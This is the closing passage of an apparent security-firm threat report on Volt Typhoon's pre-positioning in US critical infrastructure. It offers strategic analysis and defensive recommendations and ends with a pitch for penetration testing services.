The emergence of Volt Typhoon has forced a fundamental reassessment of the Chinese cyber threat. For two decades, the Western cybersecurity community conceptualised Chinese cyber operations primarily as an espionage and intellectual property theft problem — damaging to economic competitiveness and national security, but not an immediate threat to physical safety or critical services. Volt Typhoon shattered that framework. The group's focus on pre-positioning in infrastructure whose disruption would cause real-world harm to civilian populations — loss of power, loss of water treatment, loss of communications, disruption of transportation — represents a qualitative escalation in the threat. The analogy is not to a spy stealing secrets but to a saboteur planting charges on a bridge: the damage has not occurred yet, but the capability to cause it has been established and is being maintained. This shift from espionage to operational preparation is the most significant development in the Chinese cyber threat landscape since Mandiant's 2013 APT1 report first exposed the scale of PRC state-sponsored hacking.


The bottom line.

Volt Typhoon is unlike any threat group that has come before it — not because of the sophistication of their malware (they barely use any), not because of the novelty of their exploits (they exploit known vulnerabilities), and not because of the scale of their data theft (they steal almost nothing). Volt Typhoon is unique because of their intent. They are building and maintaining the capability to disrupt critical infrastructure services — power, water, communications, transportation — across the United States and its Pacific territories, at a time of their choosing, in support of potential PRC military operations. Every compromised water utility, every persistent foothold in an energy company, every backdoored telecommunications switch is a pre-positioned capability waiting to be activated. The living-off-the-land methodology is not a limitation — it is a deliberate strategic choice that maximises the probability of remaining undetected for the years or decades that may elapse between initial compromise and operational activation.

The challenge Volt Typhoon poses to defenders is existential in a way that traditional cyber threats are not. Ransomware demands a payment; espionage steals data; hacktivism defaces websites. These are damaging but bounded events with understood consequences. Volt Typhoon represents the possibility of a coordinated, multi-sector infrastructure disruption during a geopolitical crisis — loss of power to military installations and surrounding communities, disruption of water treatment affecting public health, severed communications hampering emergency response, paralysed transportation impeding military logistics. The CISA and FBI directors have used language — 'the defining threat of our generation,' 'preparation to wreak havoc and cause real-world harm' — that is extraordinary for senior government officials and reflects the gravity with which the US national security establishment views this threat. The response requires not just better detection tools but a fundamental rethinking of how critical infrastructure networks are architected, segmented, monitored, and defended.

For critical infrastructure operators, the message is clear and urgent: assume compromise and act accordingly. Implement the enhanced logging, behavioural baselining, and proactive hunting capabilities necessary to detect living-off-the-land activity. Harden the IT/OT boundary to prevent compromise of information technology networks from cascading to operational technology systems. Replace end-of-life network equipment that cannot be patched and provides a foothold for ORB networks. Invest in identity security and privileged access management to deny adversaries the credential abuse that Volt Typhoon depends on. And do all of this with the understanding that the threat is not hypothetical — CISA has confirmed that Volt Typhoon has been inside US critical infrastructure networks for years, and their access has been used to map network topologies, identify OT system boundaries, and position for disruption. The charges are already planted. The question is whether defenders can find and defuse them before they are detonated.


Is your critical infrastructure prepared for living-off-the-land threats?

Our penetration testing and threat intelligence services can evaluate your defences against Volt Typhoon's specific tactics — LOTL technique detection, edge device exploitation, credential abuse, SOHO router compromise, and OT/IT boundary security — to identify gaps before a state-sponsored adversary exploits them.